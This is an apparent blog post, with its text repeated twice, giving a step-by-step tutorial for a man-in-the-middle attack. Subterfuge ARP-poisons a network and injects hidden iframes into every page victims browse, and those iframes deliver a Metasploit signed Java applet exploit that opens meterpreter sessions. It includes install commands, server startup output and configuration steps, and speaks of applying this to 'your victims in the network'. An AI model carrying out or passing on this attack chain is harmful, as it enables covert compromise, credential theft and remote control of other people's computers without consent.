Hello , i wanna share an interesting technique By which we would get a meterpreter Session Over a MITM in a very easy way.
Tools:
1. Ubuntu [Recommended Kali]
2. Subterfuge [Download Here]
3. Armitage/Metasploit
Now We are familiar with armitage and ubuntu.
What is Subterfuge?
Subterfuge is an automated Man In The Middle Attack Framework. Subterfuge is a web based tools that can run smoothly using ur localhost system without installing webserver (it is included in the installation software). It is a simple but devastatingly effective credential-harvesting program, which exploits vulnerabilities in the inherently trusting Address Resolution Protocol.
![[Image: SubterGUI_thumb.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uKaoVNz1vy-EWeXSU2a4tLTIVFDplZVSImHRqeqnFMfAtacxRcH-Fs4luRuOtIC4P4BiDlheJWlTGFtSSwC2Rq1Bm9m0DXCWPkSv_qsxO-_B9xd80DODXOez830y1jdg-pqzM8sEeR8pzOncMfhXEuK_32s3JeLLh8P2yPB-wC2p3ZKT98JXQzTTIexOlqbNRj2dtzyFdl64wf0pAfb3ri=s0-d)
Host Machine = windows 7
Victim Machine = Windows xp
Exploit Machine = Kali
Procedure
1 .Start Your VM and Load Kali .
2.Installation of Subterfuge:
Installer Is graphical and you won't have any problem.
If we get Such output after Running subterfuge then it is successfully installed.
Setting The Environment
a) In A real scenario When you are hacking into a network through VM don't forget to replicated the Network to your VM machine
b) In VM Do It iway
![[Image: Capture1.JPG]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuFiWXIZdD6PBSr5yvxmF758RwxsJAXYB6s1NkNfC5XghCcCPW65rHvEX23XmzdX25GSIw1OHtcwhs8MHNJa_K6-wMsEHviQ4js9cirb7x3EVKPq-q4ZAwCS_47bGQ2-LIXBEABkrYtNAp/s1600/Capture1.JPG)
3. Now Start subterfuge On External Ip adderss and on Any port You desire, This will Allow us to control Subterfuge from anywhere Around Netwotk
subterfuge -s IP:port
In This Case
Now Minimize it.
Now You can Configure It from Anywhere Around Your network
Now Open Up Browser And Put the Address Of subterfuge
In This Case we Can configure it from exploit machine itself Or from our host Machine i.e Win 7
Exploit Machine:
![[Image: Capture2.JPG]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9PQIdieta79qf8hpjAYfLvxPjoJ6qJVA1dklFzBZlB3CCbPcbrE0ozJyzkHzua9IVJRZKovvnT5cPhG6XdRhBGCV2hUxypc84e4icWAHc87XZgQL51IO2z7N5eJjihzTGWHitCRhNdM7m/s1600/Capture2.JPG)
Host Machine
![[Image: Capture3.JPG]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEJPzhxkpdnm21nkPwF_9IfEfbY9khQBGLrA4wv_Eh3wL6nwCnYuCYTFqLf9j0O_w2U_NWn3PJo4R2GFaoA_SXxzX1yoCemI5yeLS2fKMYWul2KpPDEof-9RK65rPgzhjYyk37h6Lix3oT/s1600/Capture3.JPG)
Configuring Suberfuge:
a) Click On settings
b) Select the network interface And Gateway
![[Image: Capture4.JPG]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMXQzDiTrQqoMK8_RR0wmZcBeCOWKfrqcy9hAqz3aV42bIGg57a-0J317KGoF5fSCR7zkYyGlX0AYG6pFk2HCh9GgJgRTNDiD-FAP27MY3x1eBTl68RQwE_nPHdUDwv51h67hJVCgBKu2l/s1600/Capture4.JPG)
Note: Don't Auto configure as in some cases It results in problem
For VM , Go in Virtual network Editor to know and configure Your Gateway
c) In configuration section , You can Configure Injection rate and page reload rate
Injection rate Is the Timer After Which the Payload is Sent to victim.
![[Image: Capture5.JPG]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFgisd4_nXecQpvHEpS8i9DSr0YvMYbTiwitTs5OBQ6xcIYoKNko87sUrK-OQeH5I9W4I8VN5a6czaVJEowqE9JdLxopDFRCJmmFCKFXjnUgx1iW-P1F-I4MrfF3OPvRQJqBzhKFYv2Ebp/s1600/Capture5.JPG)
Click Apply To save settings
4. Go to modules And Select HTTP Code Injection
![[Image: Capture111.JPG]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0JknzFqjVZ5M-flxhVMQRq0cf5K5ylqdRar5VFFxDweiIFvMjgKUphon53v8BN_TKubwgpKBXkkarXesj28xhLstuhlBMMo944GBhI1VcKQZYEtZ_cAFyEp8QavSHbGxf_a5GEob4vsCP/s1600/Capture111.JPG)
5. Then Exploit as inject-ext-server and Payload as Iframe Injection
6. Fill In the IP of Exploit Machine i.e Kali and the port [Through Which Payload is Going to travel] Always 80 or 8080 for Http Injection
7. Click Apply , Go to Homepage and Click Start
Subterfuge is now Started
8. This Is the output You should Get on exploit machine where started subterfuge
![[Image: Capture6.JPG]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMGFju1hmHKOpkmz8T5KsKkP_cocx583ukHhCQDhUnu-2r13rw2VQKun9rlwM_mWRfie3ICrnaLky7gZCH-Ox4W9uMzCLbEXn55oe6HfiV6hfDFgcMLYHEcMeqdHGASuUJbS4RG-lp1R3D/s1600/Capture6.JPG)
Lets Configure the Payload
9. Start Up Armitage And Search signed Java Applet, Click On it Options are already configured and correct . Just set the URI Path To "/".
Note: Port Should be same as You put in subterfuge for sending Exploit
![[Image: Capture7.JPG]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguM2oQKZ8UEsdJvvvOJR3qdDPDKAE3E61jhMNbrQ28A90KdrucvJoRsnXwNMFDKLo92TBkmO0as1sp_T27szDuR7S0AfavaTCJdfvk82MbaLBNjSE8XiEUoZg4HDzYNNJqswXDPN4RpNxV/s1600/Capture7.JPG)
10. Start The exploit Server
![[Image: Capture8.JPG]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPJS0hsnSBCDGWMlzX1zV0_jOWTac152bQJGh61YlYtpKaL-Dc55M6djAkHLwnZ13m4EqovNJGF9z6wTyks2kgmZU8YjEzPNnUDpvdb6G0SI95s5Rd_x9rtUd-BEQWY9FbP2qZX1lGoSid/s1600/Capture8.JPG)
11 . Open Up subterfuge again and Refresh it , Till You See a green Loading Bar
![[Image: Capture9.JPG]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXAlor7HfR8hE1J19DQxQ0TmXy3igZKOMkT-D3iKpfqcZ-NsLknqG9cs7D2Ws3BPdB3N-fphr_8seNjDOZluRgpoV1hbRWQ8xTrZRdqzqLnKiYiC3MNH9IPGyzAfKSrju_fkkPafvYdeWs/s1600/Capture9.JPG)
Everything Done , Now As soon as your victims in the network Browses anything There Will Be A Hidden Iframe on every page with Java applet.
You Will Started getting meterpreter session in armitage
Victim:
![[Image: Capture10.JPG]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5emR5mPexRDzQD6EzPE2NmuZBnu1_GsDceenQtkteuutQP8EtOFyxbVxhsjsUi71MPzwv89bwXaMVGqeOkwUb5ZIfpqqCtyKo4RtfWFMxlB9lvA58BGvALYZifETketFKFfvpz9B9golx/s1600/Capture10.JPG)
Meterpreter Session:
![[Image: Capture12.JPG]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlGK69gMUK5dIaE28RSGISvSW8r-ugohIcQAV-F3IQpQYP5BchuZG0I73gMOu3YTlYXGuZjG_ZXtt-ch5B6OcvMea3YBy0HFAcoM2EdPBYxlYC34K1KD5wBfsPVjxeSnKodWd-10fD_kLe/s1600/Capture12.JPG)
It took me 3hrs To write this , It take 3 sec To say Thanx
Tools:
1. Ubuntu [Recommended Kali]
2. Subterfuge [Download Here]
3. Armitage/Metasploit
Now We are familiar with armitage and ubuntu.
What is Subterfuge?
Subterfuge is an automated Man In The Middle Attack Framework. Subterfuge is a web based tools that can run smoothly using ur localhost system without installing webserver (it is included in the installation software). It is a simple but devastatingly effective credential-harvesting program, which exploits vulnerabilities in the inherently trusting Address Resolution Protocol.
Host Machine = windows 7
Victim Machine = Windows xp
Exploit Machine = Kali
Procedure
1 .Start Your VM and Load Kali .
2.Installation of Subterfuge:
Installer Is graphical and you won't have any problem.
PHP Code:
root@digit-laptop:~# tar -zxvf SubterfugePublicBeta5.0.tar.gz
root@digit-laptop:~# cd subterfuge
root@digit-laptop:~# python install.py -i
Running Subterfuge :
root@digit-laptop:~#subterfuge If we get Such output after Running subterfuge then it is successfully installed.
Setting The Environment
a) In A real scenario When you are hacking into a network through VM don't forget to replicated the Network to your VM machine
b) In VM Do It iway
3. Now Start subterfuge On External Ip adderss and on Any port You desire, This will Allow us to control Subterfuge from anywhere Around Netwotk
subterfuge -s IP:port
In This Case
PHP Code:
root@kali:~# subterfuge -s 192.168.72.131:9000
Subterfuge courtesy of r00t0v3rr1d3 & 0sm0s1z
Validating models...
0 errors found
Django version 1.3.1, using settings 'subterfuge.settings'
Development server is running at http://192.168.72.131:9000/
Quit the server with CONTROL-C. Now You can Configure It from Anywhere Around Your network
Now Open Up Browser And Put the Address Of subterfuge
In This Case we Can configure it from exploit machine itself Or from our host Machine i.e Win 7
Exploit Machine:
Image has been scaled down 21% (870x471). Click this bar to view original image (1095x592). Click image to open in new window.
Host Machine
Image has been scaled down 37% (870x489). Click this bar to view original image (1365x767). Click image to open in new window.
Configuring Suberfuge:
a) Click On settings
b) Select the network interface And Gateway
Image has been scaled down 37% (870x414). Click this bar to view original image (1362x648). Click image to open in new window.
Note: Don't Auto configure as in some cases It results in problem
For VM , Go in Virtual network Editor to know and configure Your Gateway
c) In configuration section , You can Configure Injection rate and page reload rate
Injection rate Is the Timer After Which the Payload is Sent to victim.
Image has been scaled down 37% (870x410). Click this bar to view original image (1365x642). Click image to open in new window.
Click Apply To save settings
4. Go to modules And Select HTTP Code Injection
Image has been scaled down 32% (870x402). Click this bar to view original image (1262x583). Click image to open in new window.
5. Then Exploit as inject-ext-server and Payload as Iframe Injection
6. Fill In the IP of Exploit Machine i.e Kali and the port [Through Which Payload is Going to travel] Always 80 or 8080 for Http Injection
7. Click Apply , Go to Homepage and Click Start
Subterfuge is now Started
8. This Is the output You should Get on exploit machine where started subterfuge
Lets Configure the Payload
9. Start Up Armitage And Search signed Java Applet, Click On it Options are already configured and correct . Just set the URI Path To "/".
Note: Port Should be same as You put in subterfuge for sending Exploit
Image has been scaled down 22% (870x507). Click this bar to view original image (1107x645). Click image to open in new window.
10. Start The exploit Server
Image has been scaled down 10% (870x493). Click this bar to view original image (962x545). Click image to open in new window.
11 . Open Up subterfuge again and Refresh it , Till You See a green Loading Bar
Image has been scaled down 36% (870x448). Click this bar to view original image (1354x696). Click image to open in new window.
Everything Done , Now As soon as your victims in the network Browses anything There Will Be A Hidden Iframe on every page with Java applet.
You Will Started getting meterpreter session in armitage
Victim:
Meterpreter Session:
It took me 3hrs To write this , It take 3 sec To say Thanx
0 Comments:
Post a Comment